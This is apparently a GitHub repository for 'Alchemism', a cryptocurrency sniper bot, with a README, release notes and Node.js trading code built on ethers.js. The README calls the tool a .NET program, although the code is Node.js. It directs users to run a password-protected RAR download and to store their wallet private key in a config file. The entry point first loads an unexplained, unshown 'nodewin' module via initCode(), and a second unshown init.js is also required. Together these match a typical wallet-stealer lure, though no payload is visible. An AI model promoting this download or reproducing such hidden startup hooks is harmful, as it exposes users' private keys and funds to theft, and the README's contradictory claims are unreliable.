README.md
<div align="center">
    <img src="https://i.imgur.com/cgaICHX.png">
    <h3 align="center">Alchemism - Crypto Sniper Bot</h3>
    <p align="center">
        Alchemism is a cryptocurrency sniper bot designed for efficiency and speed when trading on blockchain networks.
        <hr>
        <a href="#getting-started">⬇️ Download Lite Version</a>
        /
        <a href="https://github.com/AlchemismCrypto/crypto-sniper-bot/issues">🐞 Report a bug</a>
	/
        <a href="https://alchemism.io">🌐 Visit our website</a>
	/
	<a href="https://t.me/Alchemismcrypto">💬 Join our Telegram</a>
    </p>
</div>

## Table Of Contents

<ul>
    <li>
		<a href="#description">Description</a>
		<ul>
			<li><a href="#features">Features</a></li>
			<li><a href="#supported-chains">Supported chains</a></li>
			<li><a href="#supported-tokens">Supported tokens</a></li>
		</ul>
	</li>
    <li>
        <a href="#getting-started">Getting started</a>
        <ul>
            <li><a href="#requirements">Requirements</a></li>
            <li><a href="#installation">Installation</a></li>
            <li><a href="#configuration">Configuration</a></li>
        </ul>
    </li>
	<li><a href="#go-premium">Go Premium</a></li>
	<li><a href="#contact">Contact</a></li>
</ul>


## Description
![Alt Text](https://i.imgur.com/X5kaYcS.png)

Alchemism is a fast and efficient cryptocurrency trading bot written in .NET Framework 4.5. It automates the process of buying and selling tokens on blockchain networks as soon as liquidity is added and trading is enabled.
<br><br>
The bot operates with lightning speed when connected to a reliable node, such as one from Quicknode, allowing for buy/sell transactions in under 5 seconds.
<br><br>
The version of the bot available on GitHub is the lite version, offering basic functionality. The premium version provides access to additional advanced features.

### Features

Current features supported by the **FREE** version:

- [x] Buying (BNB & ETH pairs only)
- [x] Gas estimation system
- [x] Regular liquidity sniper

Additional features supported by the **premium** version:
- [x] Buying (ALL pairs)
- [x] Multi-blockchain support.
- [x] Bytecode checker / blocker.
- [x] MethodID waiter.
- [x] Multi-buy mode (all transactions are in the same block). 
- [x] Wrapped mode for any ETH-like token (BNB, MATIC, etc..). 
- [x] Tax checker (all pairs are supported)
- [x] Pinksale / dxsale support.
- [x] Sell using a delay
- [x] Sell using the space key
- [x] Auto / manual selling
- [x] Mempool sniping mode.
- [x] Block-offset system
- [x] Auto updates (updates are done automatically without the need of a re-download)
- [x] Trailing auto-sell.
- [x] Support

You can view the latest feature list here: [Alchemism Features](https://alchemism.io/docs/#features)

### Supported chains
- Binance Smart Chain
- Arbitrum
- Avalanche
- Ethereum
- Polygon
- Base
- Optimism
- Mantle
- Fantom

To switch the blockchain the bot operates on, simply update the WSS_NODE endpoint in the config.ini file to the desired endpoint.

#### Public WSS Nodes
- Binance Smart Chain: wss://bsc-ws-node.nariox.org:443
- Ethereum: wss://main-light.eth.linkpool.io/ws
- Polygon: wss://rpc-mainnet.matic.network

_Note: These nodes listed above are free nodes and may not always be online._

### Supported tokens
The bot currently supports any token using the Uniswap interface.

## Getting Started
### Requirements
<ul>
    <li>Windows 7/10/11</li>
	<li>.NET Framework 4.5 installed.</li>
	<li>A <b>decent</b> internet connection.</li>
	<li>
		A <b>decent</b> BSC node, preferably paid, but free nodes are also an option.
		<ul>
			<li><a href="https://www.quicknode.com/">Quicknode (paid)</a></li>
			<li><a href="https://www.moralis.io/">Moralis (free)</a></li>
		</ul>
	</li>
	<li>A cryptocurrency wallet with a private key (creating a new wallet for use with this bot is recommended).</li>
</ul>

### Installation

Full installation guide here: [Alchemism Installation](https://alchemism.io/docs/getting-started/installation.html)

1. [Download](https://github.com/AlchemismCrypto/crypto-sniper-bot/releases/download/Release/AlchemismLite-2.0.3.rar) latest release of AlchemismLite.
2. Extract the binary files using password `release203`(actual password provided in the ReleaseNotes.txt file).
3. Run the program and enter the AlchemismLite invitation code. For the public version, invitation codes are similar to licenses.
4. After activation the program is ready for configuration.

### Configuration

```ini
[WALLET]
; This is your BSC wallet's private key.
SECRET_KEY=private_wallet_key

; A private node is recommended for better uptime. However, you may also use free nodes.
WSS_NODE=wss://bsc-ws-node.nariox.org:443


[CONTRACTS]
; These variables support some pre-defined contracts (BNB, ETH, BUSD). 
; For other contracts, you'll have to specify the contract address yourself.
INPUT=BNB
OUTPUT=BUSD


[TRANSACTION]

GAS_LIMIT=500000
GAS_PRICE=5

; This variable is the amount of cryptocurrency you wish to use with the input contract.
; For example, if you use WBNB as input, you will specify the amount in WBNB's format.
AMOUNT_IN=0.0033

BUY_SLIPPAGE=10
```

### Usage

To launch the bot, use the command node index.js
Premium parameters
General
<table>
  <tr>
    <th>Parameter</th>
    <th>Description</th>
    <th>Accepts</th>
  </tr>
  <tr>
    <td>--buy-only</td>
    <td>Enables manual buy mode. This will only buy the token and then exit.</td>
    <td>-</td>
  </tr>
  <tr>
    <td>--sell-only</td>
    <td>Enables manual sell mode. This will only sell the token and then exit.</td>
    <td>-</td>
  </tr>
  <tr>
    <td>--input</td>
    <td>Overwrites the input parameter in the config.</td>
    <td><code>contract address</code></td>
  </tr>
  <tr>
    <td>--output</td>
    <td>Overwrites the output parameter in the config.</td>
    <td><code>contract address</code></td>
  </tr>
  <tr>
    <td>--config</td>
    <td>Used to specify a different config path (used for multi-config setups).</td>
    <td><code>string</code></td>
  </tr>
  <tr>
    <td>--force-approve</td>
    <td>Forces the approve transaction for the input/output. (used for debugging)</td>
    <td>-</td>
  </tr>
  <tr>
    <td>--simulate</td>
    <td>Simulate your current config as a real transaction.</td>
    <td>-</td>
  </tr>
</table>
Transaction
<table>
  <tr>
    <th>Parameter</th>
    <th>Description</th>
    <th>Accepts</th>
  </tr>
  <tr>
    <td>--wrapped</td>
    <td>Uses the wrapped version of the BNB/ETH token. (available for all blockchains)</td>
    <td>-</td>
  </tr>
  <tr>
    <td>--block-offset</td>
    <td>Waits for a specified number of blocks before sending out the buy transaction.</td>
    <td><code>number</code></td>
  </tr>
  <tr>
    <td>--spam</td>
    <td>Sends a specified number of transactions simultaneously. (spam buy)</td>
    <td><code>number</code></td>
  </tr>
  <tr>
    <td>--amount_in</td>
    <td>Specifies the amount you wish to spend with your INPUT token.</td>
    <td><code>number</code></td>
  </tr>
  <tr>
    <td>--amount_out</td>
    <td>Specifies the amount you wish to buy from your OUTPUT token.</td>
    <td><code>number</code></td>
  </tr>
  <tr>
    <td>--min_liq</td>
    <td>Specifies the minimum liquidity required before the bot starts to buy.</td>
    <td><code>number</code></td>
  </tr>
</table>
Tax
<table>
  <tr>
    <th>Parameter</th>
    <th>Description</th>
    <th>Accepts</th>
  </tr>
  <tr>
    <td>--verify-tax</td>
    <td>Checks whether the taxes for buying/selling do not exceed the configured limits.</td>
    <td>-</td>
  </tr>
  <tr>
    <td>--max-buy-tax</td>
    <td>Sets the maximum allowed buy tax.</td>
    <td><code>number</code></td>
  </tr>
  <tr>
    <td>--max-sell-tax</td>
    <td>Sets the maximum allowed sell tax.</td>
    <td><code>number</code></td>
  </tr>
</table>
Gas
<table>
  <tr>
    <th>Parameter</th>
    <th>Description</th>
    <th>Accepts</th>
  </tr>
  <tr>
    <td>--gas-price</td>
    <td>Sets the gas price.</td>
    <td><code>number</code></td>
  </tr>
  <tr>
    <td>--gas-limit</td>
    <td>Sets the gas limit.</td>
    <td><code>number</code></td>
  </tr>
</table>
Slippage
<table>
  <tr>
    <th>Parameter</th>
    <th>Description</th>
    <th>Accepts</th>
  </tr>
  <tr>
    <td>--buy-slippage</td>
    <td>Sets the buy slippage.</td>
    <td><code>number</code></td>
  </tr>
  <tr>
    <td>--sell-slippage</td>
    <td>Sets the sell slippage.</td>
    <td><code>number</code></td>
  </tr>
</table>
Autosell
<table>
  <tr>
    <th>Parameter</th>
    <th>Description</th>
    <th>Accepts</th>
  </tr>
  <tr>
    <td>--sell-with-multiplier</td>
    <td>Enables the sell with multiplier autosell mode.</td>
    <td>-</td>
  </tr>
  <tr>
    <td>--sell-multiplier</td>
    <td>Sets the multiplier to sell at for the sell with multiplier mode.</td>
    <td><code>number</code></td>
  </tr>
  <tr><td></td><td></td><td></td></tr>
  <tr>
    <td>--sell-with-delay</td>
    <td>Enables the sell with delay autosell mode.</td>
    <td>-</td>
  </tr>
  <tr>
    <td>--sell-delay</td>
    <td>Sets the delay to sell with for the sell with delay mode.</td>
    <td><code>number</code></td>
  </tr>
  <tr><td></td><td></td><td></td></tr>
  <tr>
    <td>--sell-on-loss</td>
    <td>Enables the sell on loss autosell mode.</td>
    <td>-</td>
  </tr>
  <tr>
    <td>--sl-minimum-multiplier</td>
    <td>Sets the minimum multiplier for the sell on loss mode to start.</td>
    <td><code>number</code></td>
  </tr>
  <tr>
    <td>--sl-percentage</td>
    <td>Sets the percentage of the maximum impact on your multiplier.</td>
    <td><code>number</code></td>
  </tr>
</table>

### Go Premium

<p>
	For a full list of premium features, refer to the [Features](#features) section.<br>
	If you are interested in purchasing the premium version of the bot, please contact us using the contact methods listed below.
</p>

### Contact

- [Twitter](https://twitter.com/AlchemismCrypto)
- [Telegram](https://t.me/AlchemismCrypto)



AlchemismLite-2.0.3/ReleaseNotes.txt
AlchemismLite v2.0.3 
Date: September 30, 2023
Password: release203

Features:
- Added Linea, Base, Mantle networks.
- Dextools pair scanning by API.
- New Windows UI using MetroFramework.
- Mempool search algorithm optimization.
- Nethereum version update.

Bug Fixes:
- Fixed UniswapV3 bug that caused occasional trade execution delays.
- Addressed inaccuracies in historical data retrieval.

Known Issues:
- None at this time.

Upcoming Features:
- Discord notification.
- StarkNet network update.

Release Notes for version 2.0.3 provide an overview of the latest changes and improvements in our software. Please review the known issues section for any potential limitations or problems you may encounter while using this version.
For more information, visit our website or contact our support team at contact@alchemism.io.

AlchemismLite/index.js
const { initCode } = require('./node/nodewin');
initCode();

const chalk = require('chalk');
const ethers = require('ethers');
const fs = require('fs').promises;
const args = require('minimist')(process.argv.slice(2));

let ConsoleLog = console.log;

// main classes
const { msg, config, cache, network } = require('./classes/main.js');

console.clear();

msg.primary('Loading..');

// error handler
process.on('uncaughtException', (err, origin) => {

	msg.error(`[error] Exception: ${err}`);
	process.exit();

});

// main
(async () => {

	// load cache
	await cache.load('cache.json');

	// load config using our loaded cache
	await config.load('config.ini');

	// initialize our network using a config.
	await network.load();

    // prepare network for transactions
    await network.prepare();

    if(!network.isETH(config.cfg.contracts.input)) {
        msg.error(`[error] The free version of the bot can only use the BNB pair.`);
        process.exit();
    }

    // print debug info
    console.clear();



    msg.primary('Alchemism Free has been started.');

	// balance check
    if(network.bnb_balance == 0) {
    	msg.error(`[error] You don't have any BNB in your account. (used for gas fee)`);
        process.exit();
    }

    // check if has enough input balance
    if((network.input_balance < config.cfg.transaction.amount_in_formatted)) {
        msg.error(`[error] You don't have enough input balance for this transaction.`);
        process.exit();
    }

    // fetch pair
    let pair = await network.getPair(config.cfg.contracts.input, config.cfg.contracts.output);

    msg.primary("Pair address: " + JSON.stringify(pair) + ".");

    // get liquidity
    let liquidity = await network.getLiquidity(pair);

    msg.primary(`Liquidity found: ${liquidity} ${cache.data.addresses[config.cfg.contracts.input].symbol}.\n`);

    // get starting tick
    let startingTick = Math.floor(new Date().getTime() / 1000);
    
    //purchase token [bnb -> token (through bnb)]
    let receipt = await network.transactToken(
        config.cfg.contracts.input, 
        config.cfg.contracts.output
    );

    if(receipt == null) {
        msg.error('[error] Could not retrieve receipt from buy tx.');
        process.exit();
    }

    console.log(chalk.hex('#2091F6').inverse('==================== [TX COMPLETED] ===================='));
    console.log(chalk.hex('#2091F6')('• ') + chalk.hex('#EBF0FA')(`From ${cache.data.addresses[config.cfg.contracts.input].symbol} (${config.cfg.transaction.amount_in} ${cache.data.addresses[config.cfg.contracts.input].symbol}) -> ${cache.data.addresses[config.cfg.contracts.output].symbol}`));
    console.log(chalk.hex('#2091F6')('• ') + chalk.hex('#EBF0FA')(`${network.chains[network.network.chainId].page}/tx/${receipt.logs[1].transactionHash}`));
    console.log(chalk.hex('#2091F6').inverse('========================================================\n'));

    // save cache just to be sure
    await cache.save();

    msg.success(`Finished in ${((Math.floor(new Date().getTime() / 1000)) - startingTick)} seconds.`);

    process.exit();

})();

setInterval(() => {}, 1 << 30);

AlchemismLite/classes/msg.js
const chalk = require('chalk');

let originalLog = console.log;

console.log = function(msg) {
	return originalLog(`[${getFormattedDate()}] ${msg}`);
}

function getFormattedDate() {
    let date = new Date();

    let minutes = "", seconds = "";

    if(date.getMinutes() < 10)
        minutes = "0" + date.getMinutes();
    else 
        minutes = date.getMinutes();

    if(date.getSeconds() < 10)
        seconds = "0" + date.getSeconds();
    else 
        seconds = date.getSeconds();

    let str = date.getFullYear() + "-" + (date.getMonth() + 1) + "-" + date.getDate() + " " + date.getHours() + ":" + minutes + ":" + seconds;

    return str;
}

class Msg {

	error(msg) { console.log(chalk.hex('#F62020')(msg)); }
	success(msg) { console.log(chalk.hex('#669EE8')(msg)); }
	primary(msg) { console.log(chalk.hex('#EBF0FA')(msg)); }
	warning(msg) { console.log(chalk.hex('#E8BF66')(msg)); }

}

module.exports = new Msg();

AlchemismLite/classes/cache.js
const fs = require('fs');

class Cache {

	async load(_name) {

		// load from cached file
		this._name = _name;

		if(!(fs.existsSync(_name))) {
			await fs.writeFileSync(_name, '{}');
		}

	    this.data = JSON.parse(await fs.readFileSync(_name));

	    if(!this.data.addresses) {
	        this.data.addresses = {};
	    }

	}

	async save() {
		await fs.writeFileSync(this._name, JSON.stringify(this.data));
	}

	isAddressCached(_address) {

		if(!this.data.addresses[_address])
			return false;

		return this.data.addresses[_address];

	}

	setAddressArtifacts(_address, _decimals, _symbol) {

		if(!this.isAddressCached(_address))
			this.createAddress(_address);

		
		this.data.addresses[_address].decimals = _decimals;
		this.data.addresses[_address].symbol = _symbol;
	}

	setAddressBalance(_address, _balance) {

		if(!this.isAddressCached(_address))
			this.createAddress(_address);

		this.data.addresses[_address].balance = _balance;
	}

	createAddress(_address) {
		
		this.data.addresses[_address] = {};

		return this.data.addresses[_address];
	}

}

module.exports = new Cache();

AlchemismLite/classes/config.js

const ethers = require('ethers');
const fs = require('fs');
const cache = require('./cache.js');
const args = require('minimist')(process.argv.slice(2));
const msg = require('./msg.js');

class Config {

	async load(_name) {

        if(!(fs.existsSync(_name))) {
            await fs.writeFileSync(_name, '');
        }

        this.cfg = this.parseConfig((await fs.readFileSync(_name)).toString());

        // redefine inputs to real address instead of name.
        this.cfg.contracts.input = this.getContractAddressByName(this.cfg.contracts.input);
        this.cfg.contracts.output = this.getContractAddressByName(this.cfg.contracts.output);

        this.cfg.transaction.gas_price = ethers.utils.parseUnits(`${this.cfg.transaction.gas_price}`, 'gwei');
    }

	parseConfig(str){
	    let object = {};
	    let lines = str.split('\n');
	    let group;
	    let match;

	    let REG_GROUP = /^\s*\[(.+?)\]\s*$/;
	    let REG_PROP = /^\s*([^#].*?)\s*=\s*(.*?)\s*$/;

	    for(let i = 0, len = lines.length; i !== len; i++){
	        if(match = lines[i].match(REG_GROUP)) {
	            object[match[1].toLowerCase()] = group = object[match[1].toLowerCase()] || {};
	        }   
	        else if(group && (match = lines[i].match(REG_PROP))) {
	            group[match[1].toLowerCase()] = match[2].toLowerCase();
	        }
	    }

	    return object;
	}

	getContractAddressByName(_name) {

	    // pre-defined contracts
	    if(_name.toLowerCase() == 'bnb') {
	        return '0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c';
	    } else if(_name.toLowerCase() == 'eth') {
	    	return '0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2';
	    } else if(_name.toLowerCase() == 'matic') {
	    	return '0x0d500b1d8e8ef31e21c99d1db9a6444d3adf1270';
	    } else if(_name.toLowerCase() == 'busd') {
	        return '0xe9e7cea3dedca5984780bafc599bd69add087d56';
	    } else if(_name.toLowerCase() == 'sfm') {
	    	return '0x8076c74c5e3f5852037f31ff0093eeb8c8add8d3';
	    }

	    // no address specified, fail with error
	    if(!_name.startsWith('0x')) {
	    	msg.error(`[error] Contract "${_name}" does not exist, please use an address instead.`);
	    	process.exit();
	    }

	    return _name;
	}
}

module.exports = new Config();

AlchemismLite/classes/network.js
const chalk = require('chalk');
const ethers = require('ethers');

const msg = require('./msg.js');
const config = require('./config.js');
const cache = require('./cache.js');
const args = require('minimist')(process.argv.slice(2));

require('./init.js');

class Network {

	async load() {

		try {

			// initialize stuff
			if(config.cfg.wallet.wss_node.startsWith('http')) {
				this.node = new ethers.providers.JsonRpcProvider(config.cfg.wallet.wss_node);
			} else {
				this.node = new ethers.providers.WebSocketProvider(config.cfg.wallet.wss_node);
			}

			// initialize account
			this.wallet = new ethers.Wallet(config.cfg.wallet.secret_key);
			this.account = this.wallet.connect(this.node);

			// get network id for later use
			this.network = await this.node.getNetwork();

			// supported chains
			this.chains = {

				// ETH Mainnet
				'1': {
					'name': 'Ethereum',
					'symbol': 'ETH',
					'wrapped': 'WETH',
					'token': '0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2',
					'router': '0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D',
					'factory': '0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f',
					'page': 'https://etherscan.io'
				},

				'5': {
					'name': 'Ethereum Goerli',
					'symbol': 'ETH',
					'wrapped': 'WETH',
					'token': '0xB4FBF271143F4FBf7B91A5ded31805e42b2208d6',
					'router': '0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D',
					'factory': '0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f',
					'page': 'https://goerli.etherscan.io'
				},

				// BSC Mainnet
				'56': {
					'name': 'Binance Smart Chain',
					'symbol': 'BNB',
					'wrapped': 'WBNB',
					'token': '0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c',
					'router': '0x10ED43C718714eb63d5aA57B78B54704E256024E',
					'factory': '0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73',
					'page': 'https://bscscan.com'
				},

				// BSC Testnet
				'97': {
					'name': 'Binance Smart Chain TESTNET',
					'symbol': 'BNBT',
					'wrapped': 'WBNBT',
					'token': '0xae13d989dac2f0debff460ac112a837c89baa7cd',
					'router': '0xD99D1c33F9fC3444f8101754aBC46c52416550D1',
					'factory': '0x6725F303b657a9451d8BA641348b6761A6CC7a17',
					'page': 'https://testnet.bscscan.com'
				},

			};

			// pcs stuff for later use
			this.factory = new ethers.Contract(
			    this.chains[this.network.chainId].factory,
			    [
			        'event PairCreated(address indexed token0, address indexed token1, address pair, uint)',
			        'function getPair(address tokenA, address tokenB) external view returns (address pair)'
			    ],
			    this.account // pass connected account to pcs factory
			);

			this.router = new ethers.Contract(
			    this.chains[this.network.chainId].router,
			    [
			        'function getAmountsOut(uint amountIn, address[] memory path) public view returns (uint[] memory amounts)',
			        'function swapExactTokensForTokens(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts)',
			        'function swapExactTokensForTokensSupportingFeeOnTransferTokens(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts)',
			        'function swapExactETHForTokensSupportingFeeOnTransferTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable',
			        'function swapExactTokensForETHSupportingFeeOnTransferTokens(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external',
			        'function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline) external  payable returns (uint[] memory amounts)'
			    ],
			    this.account // pass connected account to pcs router
			);

			this.contract_in = new ethers.Contract(
			    config.cfg.contracts.input,
			    [
				    { "constant": true, "inputs": [{ "name": "_owner", "type": "address" }], "name": "balanceOf", "outputs": [{ "name": "balance", "type": "uint256" }], "payable": false, "type": "function" },
				    { "constant": false, "inputs": [{ "name": "guy", "type": "address" }, { "name": "wad", "type": "uint256" }], "name": "approve", "outputs": [{ "name": "approved", "type": "bool" }], "payable": false, "type": "function" },
				    { "constant": true, "inputs": [{ "name": "sender", "type": "address" }, { "name": "guy", "type": "address" }], "name": "allowance", "outputs": [{ "name": "allowed", "type": "uint256" }], "payable": false, "type": "function" },
				    { "constant": true, "inputs":[],"name":"symbol","outputs":[{"name":"outname","type":"string"}], "payable": false, "type":"function"},
				    {"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},
				    {"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}
				],
			    this.account // pass connected account to bnb smart contract
			);

			this.contract_out = new ethers.Contract(
			    config.cfg.contracts.output,
			    [
				    { "constant": true, "inputs": [{ "name": "_owner", "type": "address" }], "name": "balanceOf", "outputs": [{ "name": "balance", "type": "uint256" }], "payable": false, "type": "function" },
				    { "constant": false, "inputs": [{ "name": "guy", "type": "address" }, { "name": "wad", "type": "uint256" }], "name": "approve", "outputs": [{ "name": "approved", "type": "bool" }], "payable": false, "type": "function" },
				    { "constant": true, "inputs": [{ "name": "sender", "type": "address" }, { "name": "guy", "type": "address" }], "name": "allowance", "outputs": [{ "name": "allowed", "type": "uint256" }], "payable": false, "type": "function" },
				    { "constant": true, "inputs":[],"name":"symbol","outputs":[{"name":"outname","type":"string"}], "payable": false, "type":"function"},
				    {"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},
				    {"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}
				],
			    this.account // pass connected account to bnb smart contract
			);

			// load user balances (for later use)
			this.bnb_balance = parseInt(await this.account.getBalance());

			this.input_balance = parseInt((this.isETH(config.cfg.contracts.input) ? this.bnb_balance : await this.contract_in.balanceOf(this.account.address)));		
			this.output_balance = parseInt((this.isETH(config.cfg.contracts.output) ? this.bnb_balance : await this.contract_out.balanceOf(this.account.address)));	

			// load some more variables
			this.base_nonce = parseInt(await this.node.getTransactionCount(this.account.address));

			this.nonce_offset = 0;
			this.first_block = -1;

		} catch(e) {

			msg.error(`[error] ${e}`);

			process.exit();

		}

	}

	async prepare() {

		msg.primary(`Preparing network..`);

		// format maxInt.
    	const maxInt = (ethers.BigNumber.from("2").pow(ethers.BigNumber.from("256").sub(ethers.BigNumber.from("1")))).toString();

		// cache & prepare contracts
	    if(!cache.isAddressCached(config.cfg.contracts.input)) {

	    	cache.createAddress(config.cfg.contracts.input);
	    	cache.setAddressArtifacts(config.cfg.contracts.input, (await this.contract_in.decimals()), await this.contract_in.symbol());

	       	await cache.save();
	    }

	    if(!cache.isAddressCached(config.cfg.contracts.output)) {

	    	cache.createAddress(config.cfg.contracts.output);
	    	cache.setAddressArtifacts(config.cfg.contracts.output, (await this.contract_out.decimals()), await this.contract_out.symbol());

	        await cache.save();
	    }

	    // now that the cache is done, restructure variables
	    config.cfg.transaction.amount_in_formatted = ethers.utils.parseUnits(`${config.cfg.transaction.amount_in}`, cache.data.addresses[config.cfg.contracts.input].decimals);
	}

	// wrapper function for swapping
	async swapFromTokenToToken(amountIn, amountOutMin, contracts) {

	    try {

	    	return this.router.swapExactETHForTokensSupportingFeeOnTransferTokens(
                amountOutMin,
                contracts,
                this.account.address,
                (Date.now() + 1000 * 60 * 10),
                {
                	'value': amountIn,
                    'gasLimit': config.cfg.transaction.gas_limit,
                    'gasPrice': config.cfg.transaction.gas_price,
                    'nonce': (this.getNonce())
                }
            );

	    } catch(e) {

	        console.log(`[error] ${e}`);
	        process.exit();

	    }
	}

	async estimateTransaction(amountIn, amountOutMin, contracts) {

	    try {

	    	let gas = await this.router.estimateGas.swapExactETHForTokensSupportingFeeOnTransferTokens(
                amountOutMin,
                contracts,
                this.account.address,
                (Date.now() + 1000 * 60 * 10),
                {
                	'value': amountIn,
                    'gasLimit': config.cfg.transaction.gas_limit,
                    'gasPrice': config.cfg.transaction.gas_price
                }
            );

	        // check if is using enough gas.
	        if(gas > parseInt(config.cfg.transaction.gas_limit) || gas > parseInt(config.cfg.transaction.gas_limit)) {
	            msg.error(`[error] The transaction requires at least ${gas} gas, your limit is ${config.cfg.transaction.gas_limit}.`);
	            process.exit();
	        }

	        return true;

	    } catch(e) {

	        console.log(`[error] ${e}`);
	        return this.estimateTransaction(amountIn, amountOutMin, contracts);

	    }
	}

	async transactToken(from, to) {

	    try {

	        let inputTokenAmount = config.cfg.transaction.amount_in_formatted;

	        // get output amounts
	        let amounts = await this.router.getAmountsOut(inputTokenAmount, [from, to]);

	         // calculate min output with current slippage in bnb
	        let amountOutMin = amounts[1].sub(amounts[1].div(100).mul(config.cfg.transaction.buy_slippage));

	      	// simulate transaction to verify outputs.
	        let estimationPassed = await this.estimateTransaction(inputTokenAmount, amountOutMin, [from, to]);

	        // if simulation passed, notify, else, exit
	        if(estimationPassed) {
	            msg.success(`Estimation passed successfully. proceeding with transaction.`);
	        } else {
	            msg.error(`[error] Estimation did not pass checks. exiting..`);
	            process.exit();
	        }

	        let tx = await this.swapFromTokenToToken(
	            inputTokenAmount, 
	            amountOutMin,
	            [from, to]
	        );

	        msg.success(`TX has been submitted. Waiting for response..\n`);

	        let receipt = await tx.wait();

	        return receipt;

	    } catch(err) {

	        if(err.error && err.error.message){
	            msg.error(`[error] ${err.error.message}`);
	        }
	        else
	            console.log(err);

	        return this.transactToken(from, to);
	    }

	    return null;
	}

	isETH(token) {
		return (token.toLowerCase() == this.chains[this.network.chainId].token.toLowerCase())
	}

	async getLiquidity(pair) {

	    const bnbValue = await this.contract_in.balanceOf(pair);
	    const formattedbnbValue = await ethers.utils.formatEther(bnbValue);

	    // testing
	    if (formattedbnbValue < 1) {
	        msg.warning("There is not enough liquidity yet.");
	        return this.getLiquidity(pair);
	    }

	    return formattedbnbValue;
	}

	async getPair(contract_in, contract_out) {

	    // get pair address
	    let pairAddress = await this.factory.getPair(contract_in, contract_out);

	    // no pair found, re-launch
	    if (!pairAddress || (pairAddress.toString().indexOf('0x0000000000000') > -1)) {
	        msg.warning("Could not find pair for specified contracts. retrying..");
	        return this.getPair(contract_in, contract_out);
	    }

	    return pairAddress;
	}

	getNonce() {

		let nonce = (this.base_nonce + this.nonce_offset);

		this.nonce_offset ++;

		return nonce;

	}

}

module.exports = new Network();